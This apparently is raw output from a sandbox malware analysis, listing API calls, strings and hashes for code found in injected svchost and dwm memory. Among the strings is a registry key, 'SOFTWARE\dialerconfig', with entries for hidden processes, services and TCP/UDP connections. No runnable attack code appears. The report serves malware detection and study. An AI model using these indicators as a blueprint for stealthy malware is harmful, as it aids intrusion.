                        • API String ID: 1092925422-2678910430
                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction ID: c1706b2b0473ed2e9d02f1dddf1a74ec365221044fa21d2a3e131ac40444c417
                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction Fuzzy Hash: 60113C3A708F45C2EF549B22E8043A972A1F788B97F644029DE895B765EF3DC916CB04
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Thread$Current$Context
                        • String ID:
                        • API String ID: 1666949209-0
                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                        • Instruction ID: 60ab21630707aac3798ecf9166792788bd74f2907c85a2321cc20bfd57c17da0
                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                        • Instruction Fuzzy Hash: CFD17B7A259F48D1DA70DB16E89439A77A0F3CCB85F200116EA8D5BBA5DF38C552CF40
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID: dialer
                        • API String ID: 756756679-3528709123
                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction ID: e6d8faa326a562ef7d00f18873055ee8b9534239608773783dd45c2c1394fe41
                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction Fuzzy Hash: FE31923A709F59C2E615CF16ED407E977A0FB98B82F1884249E485BB56EF34C462CB00
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Value$ErrorLast
                        • String ID:
                        • API String ID: 2506987500-0
                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction ID: aa873455afc96999b87c21931bd58146887484eb7e08ab61906587a09483081b
                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction Fuzzy Hash: EA116379389E48C1FA6457259E553E931425BCC7F6F344714A8366F7DBDD28C4438E40
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                        • String ID:
                        • API String ID: 517849248-0
                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction ID: 7cc37782291b92a2b75e31e5930a5bab2ef7aa798e5d7ec79eb9ff034366abf0
                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction Fuzzy Hash: 2F016D36304E44C2EB54DB62A84839973A1F78CBC2FA84035DE4967765DF3CC99ACB00
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                        • String ID:
                        • API String ID: 449555515-0
                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction ID: d92c0bde52101c03c87867e95d8acc90603132017f221265b0eb273a598ab5d0
                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction Fuzzy Hash: 3B011B7A215F44C2FB249B22EC0839973A0BB9DB87F244428CD492B765EF3DC51A8B00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: 04aa9ae47b2a9c131ca64884b0331827bb0d1dcec54a8120c3393878895a1e76
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: CE51C63A74DA06CADB14EF15EC48B993795F389B9AF218124DA076B74ADF75CC42CB00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: cc6c5033e38e6afa751b52c8de9f6da4c93002e611e71df0da7fecd0cba56087
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: 0F31C43A348A44D6E714EF11EC447993765F388BCAF258114EE4A2B746DF39C942CF04
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: FinalHandleNamePathlstrlen
                        • String ID: \\?\
                        • API String ID: 2719912262-4282027825
                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction ID: 698509cad8b23d240c0b825ecc2b97b4a5749d1b6b2534689e1e69f203ffbdc3
                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction Fuzzy Hash: 77F03C37704A45D2EB608B61FC847997760F78CBDAFA44020DA495AA65DE2CCA9ECF00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CombinePath
                        • String ID: \\.\pipe\
                        • API String ID: 3422762182-91387939
                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction ID: de2cf2f2a9d9284385138a2729b234b0e2eb91eb51179958fd2d97b66a3f2f3e
                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction Fuzzy Hash: 8EF05439204F84C1EA104B12BD042997260A78CFD2F289120DD461BB29DE28C8568B00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction ID: 10d4d02c46d8948fd3dba8b0568bcad9390f76deb3f3d4399e5b44582f6e7a45
                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction Fuzzy Hash: C0F0627A215E04D1EB148B29EC443997320FBCDBA7F640219CA6A5D2F4CF2CC956CB00
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                        • Instruction ID: d8e4fcef7782aab0e6196fa45eef77e5817cd3fcfaeadc4be3155837d2d64916
                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                        • Instruction Fuzzy Hash: EF02A83625DB84C6E760CB55E89039AB7A1F3C8795F204015EA8E9BBA9DF7CC495CF00
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                        • Instruction ID: 2d239d733d9f377039aa2bd8920474b359dab336e32e40763e3e9fde822d2307
                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                        • Instruction Fuzzy Hash: 4961C73A559E48C6E760CB15E85435AB7A0F3CC786F600116EA8E5BBA9DF7CC452CF40
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: b22d272b1eca59d2f8be55dc33f3d675a4ea0f3ee1479b912bd1a7d695708eec
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: C411C47A610E01D1FA749568EC513E934806BDC37EF78C728BD6ABEED78EA4C8474900
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: 45fce9a1b44715b5da1f110af4fbf2b5e72d243b065df00d6a6cb7d411a89504
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: F011B23BA18F40E1FE645578DC553E531416BFC3A6E380624A5766E6F6CEA8CCA34901
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: _invalid_parameter_noinfo
                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                        • API String ID: 3215553584-4202648911
                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction ID: bfa070ed68fe50ba7f1f2c297ac04698a413684fc1faf6f2fb695e8f31954a37
                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction Fuzzy Hash: 2A6192BE60CE00C2FA658BA4DC603EA7A90E7CD792F714516CA153F795EE34C847EA00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CallEncodePointerTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3544855599-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: 7893eb5ab0e642a1a0fa3d649198329584f3167fee0553330bce6cb7a40f68a6
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: 06614C3A605A48CAEB109F65D8403DD77A1F388B99F244216DE492BB95DF38D556CB00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: ad2e3dc20faeaab019d23fdd26e7ac47928873f210296601eed610e87e364d0a
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: C051D1BA108A80CBEF648B15984439877A0F3DCB96F284116DA596BBC5CF39D462EF40
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: c55e6b89f1deeede7607d44a4678232a21c5566193418bc64356b270fa1dde39
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: 8A51B57A148B88CAEB748F25D9443D977A0F3D8B96F244115DA496BBD6CF34C462CF00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: 522bc94808ccd0891ba8f4ee668879e4334006ea7c9bfdc7b7a578e3ad5792e1
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: 4F51E7BAB15A00CAD754CF15D808B9AB395F3C8B99F609064EE066B748EF34CC42DF04
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: 425ae51dfe7bd6ea10f93c1d87e22065c9b592431508976835fcf9b4f7ab9431
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: 1131D1B9615B40DAE710DF11EC4879AB7A4F3C8B9AF258014EE4A6B794DF38C942DB04
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: FileWrite$ConsoleErrorLastOutput
                        • String ID:
                        • API String ID: 2718003287-0
                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction ID: 30429b6e85d52d015e3732def11cd14d4559421b5eb639c62a2224f3fa9bfba5
                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction Fuzzy Hash: 66D1CF77714A80C9E711CF65D8403DC3BA1F398799F24421ADE59ABBA9EE34C927CB40
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$Process$Free
                        • String ID:
                        • API String ID: 3168794593-0
                        • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction ID: 6c2322820e03c340fe85ce000d17cb2736a86ce4299153c466e268a4634f297b
                        • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction Fuzzy Hash: CF014C3B608E94D6D705DF66ED0428A77A1F78CFC2F144429EA4967729DE38C462CB40
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: ConsoleErrorLastMode
                        • String ID:
                        • API String ID: 953036326-0
                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction ID: 9698fe35d1373322723ac282d06d8dd41e13e0f968837ab8ea655e484caeaefb
                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction Fuzzy Hash: 45918E7B610A54C5F7609F65DC403ED3BA0B789B8AF38411DDE4A7B6A5DE34C8A38B00
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                        • String ID:
                        • API String ID: 2933794660-0
                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction ID: d83516dcc5bf840c11a0c3c522cc2f90a05092959f30cd3160fc22130dc72981
                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction Fuzzy Hash: A9115A3A714F00CAEB00CF60EC543A833A4F79D769F540E21EA6D5A7A4DF78D5A98780
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction ID: f47752b0ae6f6901657473cb0ccd733c6e7a9ca02a6f2b5df069b7bf189e1af2
                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction Fuzzy Hash: C571C23A248F89C6E7349E25DC443EA7794F3DDB86F640026DD496BB8ADE35C646CB00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: CallTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3163161869-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: 489574c67d8b5b6cc54a2877ae297f4e8f41fd0bb560a578f5265c3132118aee
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: 3761497A608B44CAEB20DF65D8403DD77A0F388B89F244215EF492BB99DF38D556DB40
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction ID: babde32fb5154fc8530fc586cff3b7450ac821e147294971176bd01e01761f2d
                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction Fuzzy Hash: B051E63A24CB89C1E6359B29E8583EA7751F3ED782F640125DD492BB6BCE39C5068F40
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: U
                        • API String ID: 442123175-4171548499
                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction ID: 21ff62e2b89e22826b140db66bb7822c727ad4cd8fe966186e5f0310e84707f2
                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction Fuzzy Hash: 8841A037219A80C2DB208F25E8443EAB7A0F79C795F644025EE4D9B798EF3CC952CB40
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: ExceptionFileHeaderRaise
                        • String ID: csm
                        • API String ID: 2573137834-1018135373
                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction ID: 20f4be22c22dfa457ef3525fbc3f7e3b2bed3974d008a9829f0cdff42773ce01
                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction Fuzzy Hash: 8D112B36218F84C2EB619B15F94039977E5F788B95F684224EE8D1BB69DF3CC952CB00
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: ierarchy Descriptor'$riptor at (
                        • API String ID: 592178966-758928094
                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction ID: 3b3cf7cab3b32b493eb2ba88bbe49323af7bffc66ca1579de9ffd3a8dc560e24
                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction Fuzzy Hash: 13E086B1640F44D0DF018F61EC403D873A0DB9CB68BA89122D95C5A311FE38D5FAC700
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: Locator'$riptor at (
                        • API String ID: 592178966-4215709766
                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction ID: 8b563b15b0da3dea3b2a42213421ba672c2fb53560027d55dbb8324bba71f4a8
                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction Fuzzy Hash: EDE08671600F44D0DF028F61D8403D87360E79CB68B989122C94C5A311EE38D5E6C700
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID:
                        • API String ID: 756756679-0
                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction ID: 29c7f6ae37fee443e275d0900ba1dffe24d5f51a1d6125abf64e6308baa90841
                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction Fuzzy Hash: B2118E3A615F48C1EA048B66A8043A977A0E7CDFC2F2840289E8D6B766DE38C852C700
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess
                        • String ID:
                        • API String ID: 1617791916-0
                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction ID: 0df0b71972fc614dcc7a18976dac37df89d2385fd46c5fb6c76c0ed9fa5f8c47
                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction Fuzzy Hash: 24E0653A601A04C6E7058F52DC0838E3AE1FBCDF56F14C014C9090B361DF7D88A6CB50

                        Execution Graph

                        Execution Coverage:1.6%
                        Dynamic/Decrypted Code Coverage:95.2%
                        Signature Coverage:0%
                        Total number of Nodes:124
                        Total number of Limit Nodes:16

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                        • API String ID: 106492572-2879589442
